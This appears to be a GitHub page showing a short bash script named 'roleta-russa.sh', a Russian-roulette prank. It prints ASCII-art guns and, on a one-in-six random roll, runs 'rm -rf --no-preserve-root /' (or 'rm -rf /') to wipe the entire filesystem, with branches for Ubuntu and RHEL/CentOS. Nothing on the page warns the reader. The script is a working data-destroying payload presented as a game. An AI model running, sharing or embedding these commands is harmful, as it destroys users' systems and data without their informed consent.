-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathroleta-russa.sh
42 lines (38 loc) · 1.09 KB
/
roleta-russa.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/bin/bash
if [ $[ $RANDOM % 6 ] == 0 ]; then
echo '''
\
/ />
\__+_____________________/\/\___/ /|
()______________________ / /|/\
/0 0 ---- |---- /---\
|0 o 0 ----|| - \ --| \
\0_0/____/ | | |\ \
\__/__/ | \
Bang!!! | \
| \
|__________|
'''
# Ubuntu
if [ -f /etc/lsb-release ]; then
rm -rf --no-preserve-root /
# CentOS RHEL
elif [ -f /etc/redhat-release ]; then
rm -rf --no-preserve-root /
else
rm -rf /
fi
else
echo '''
/>
__+_____________________/\/\___/ /|
()______________________ / /|/\
/0 0 ---- |---- /---\
|0 o 0 ----|| - \ --| \
\0_0/____/ | | |\ \
\__/__/ | \
Click!!! | \
| \
|__________|
'''
fi